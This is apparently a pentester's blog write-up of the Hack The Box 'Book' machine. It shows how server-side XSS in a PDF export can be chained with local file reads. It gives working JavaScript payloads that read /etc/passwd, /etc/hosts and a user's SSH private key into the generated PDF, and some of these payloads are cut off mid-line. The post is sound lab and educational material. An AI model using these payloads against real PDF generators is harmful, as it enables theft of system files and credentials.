XSS to Exfiltrate Data from PDFs

by Nairuz Abulhul

While working on the Book machine of hack the box (Scripting Track), I came across a web application that uses user-controlled inputs to generate PDF files. The user enters an input that gets rendered into a PDF file when downloaded.

I was aware of XSS and SSRF vulnerabilities tied to dynamically generated PDFs from reading many bug bounties write-ups but didn’t try it myself until I came across the Book machine.

When I saw the download functionality generating PDF files every time I click on the PDF link, I started searching for the bug bounty articles again tied to this vulnerability to refresh my memory on how to exploit it 😃.

I found that an attacker can craft a Javascript code that executes on the server-side and retrieve internal file contents. It is basically a stored XSS vulnerability that can be escalated through chaining it with Local File Inclusion or SSRF to exfiltrate the internal data.


  • Server-Side Request Forgery

I will focus on exploiting XSS vulnerability and combining it with LFI to retrieve internal files content for this post. For the demonstration part, I’ll be using the book machine.


In the user portal, the user can upload files on the Collections page under the Book Submission section.

In the admin’s panel, the Collections page can export the collections list of the files that supposedly uploaded from the user’s portal into PDF format by clicking on the PDF link.

Collections page on the admin’s portal

The functionality of generating PDF files based on the user inputs can be vulnerable in many cases to server-side XSS, leading to exfiltrating data from the vulnerable application.

So, I started compiling the essential testing checklist to go about testing the application.


  • Try HTML tags injection to see if the application parses the HTML code.
  • Test different file protocols, i.e., file, HTTP, HTTPS, when reading the internal files.
  • Use JS injections to read internal server files.

📌Synack Tip

1- Identify injectable inputs

The input fields are for the Book Title and Author name.

2- HTML Injection


Intercept the request in Burp Suite to check out the request details we are sending to the application.

and, once we send the request to the application, we switch to the admin’s panel and click on the PDF link to generate the PDF file.

PDF Export link

When it is done, we open the file, and we see the HTML tags were parsed on the backend and included in the file. AWESOME !!

3- JS injections to read internal server files

<img src="x" onerror="document.write('test')" />
inject JS in the input fields
JS was executed when the PDF generated

As we see, the JS code was executed and the word test was included in the file. The next step would be to identify the file protocol the application uses to understand how we will read the internal files on the server 😈.

I used the below on-liner to get the full URL of the current page.


As we see the application uses the file/// protocol.

Next, we can retrieve the contents of host and passwd files using the XHR requests

<script>x=new XMLHttpRequest;x.onload=function()
{document.write(this.responseText)};x.open( 'GET','file:///etc/hosts'

<script>x=new XMLHttpRequest;x.onload=function()
{document.write(this.responseText)};x.open( 'GET','file:///etc/passwd'

/etc/passwd file
/etc/hosts file

4- Retrieve SSH key and get access to the machine

By default in Linux, the SSH private key (id_rsa) resides in a hidden directory .ssh in the user’s folder inside the home directory. In our case it would be (home/reader/.ssh/id_rsa)

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reade

With that, I attempted to read the file using the default path, and extracted the content of the key.

SSH private key

Next, I needed to convert the pdf to text to extract the key, I couldn’t just copy directly from the PDF file. I used pdf2txt.py script in GitHub to do so.

The script is a part of pdfminer tools collection.

pdfminer collection on GitHub

Pass the pdf file that has the SSH key to pdf2txt script and we can get the key.

python3 pdf2txt.py ssh.pdf
Reader’s SSH Key
SSH shell


  • Encode all characters that are used in XSS and HTML payloads.
  • Implement a WAF solution in front of the application

That’s all for today. Thanks for reading !!!

About the author

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher

Featured graphics https://unsplash.com/photos/CbeApl8sxxwFredrik Öhlander

August 10, 2021
